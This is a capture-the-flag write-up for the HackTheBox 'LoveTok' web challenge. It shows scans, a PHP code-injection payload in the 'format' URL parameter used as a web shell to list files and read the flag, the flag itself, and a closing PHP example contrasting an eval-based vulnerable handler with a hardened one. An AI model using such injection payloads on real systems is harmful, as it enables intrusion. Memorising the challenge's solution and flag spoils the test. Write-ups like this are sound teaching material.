HackTheBox: LoveTok


Topic

Lab

HackTheBox:

https://app.hackthebox.com/challenges/198

Initial Enumeration

● Start Machine: http://206.189.28.180:30492/

Solution

1. Attempt

1.1 nmap scan

nmap -sC -sV -T4 206.189.28.180

This challenge is not a penetration-test box; only port 30492 is open.

1.2 dirsearch scan

dirsearch -u http://206.189.28.180:30492/

/.DS_Store

What .DS_Store is used for

1.3 Browse

1.3.1 Click on the button, url changes

http://206.189.28.180:30492/?format=r

1.3.2 Edit url

http://206.189.28.180:30492/?format=chw

(Text Changed)

2023-10-16T22:24:07+00:00101

2. Web shell

2.1 system() function

● Web Shell: https://www.imperva.com/learn/application-security/web-shell/
● HackTricks: PHP Code Execution

(The machine was restarted, so the IP changed.)

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls

2.2 Check download file

2.2.1 index.php is located in LoveTok\web_lovetok\challenge

2.2.2 Find Flag location

\LoveTok\web_lovetok

2.3 Find the flag through the web shell

TEST : http://142.93.32.153:30198/?format=${phpinfo()}

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls+../ (URL encoding: space = '+')

3. Find Flag

http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=cat+../flagNBD9R

FLAG: HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}
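
Root cause and fix, as an added example that is not the challenge's source (this page does not show index.php). It assumes the handler interpolates format into a date() call that is passed to eval, which matches the behaviour seen in 1.3 and 2.1; the function names are hypothetical.

```php
<?php
// Added example, not code from the challenge. Function names are hypothetical.

// ASSUMED vulnerable pattern: the user-supplied format becomes part of PHP
// source inside a double-quoted string and is evaluated. addslashes() only
// escapes quotes, backslashes and NUL bytes, so a "${...}" expression, which
// contains none of those, is still parsed and executed by eval().
function render_time_vulnerable(string $format): string
{
    $format = addslashes($format);
    eval('$time = date("' . $format . '");');
    return $time;
}

// Hardened form: no eval at all. date() treats its argument as data, so
// "${...}" is never parsed as code. The allowlist (date() format letters
// plus a few separators, max 32 chars) is defence in depth and keeps
// arbitrary text out of the response.
function render_time_safe(string $format, ?int $now = null): string
{
    $now = $now ?? time();
    $allowed = '/\A[dDjlNSwzWFmMntLoYyaABgGhHisuveIOPpTZcrU :,.\/-]{1,32}\z/';
    if (!preg_match($allowed, $format)) {
        return date('r', $now);   // rejected input falls back to a fixed format
    }
    return date($format, $now);
}

// The two formats from section 1.3 and the string from section 2.1.
// Single quotes keep PHP from interpolating the last sample here.
$samples = ['r', 'chw', '${system($_GET[cmd])}'];
foreach ($samples as $f) {
    printf("%-26s => %s\n", $f, render_time_safe($f));
}
```

With the hardened handler, r and chw still render as dates, while the string from 2.1 fails the allowlist and gets the fixed fallback format.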

tags: Web CTF Webshell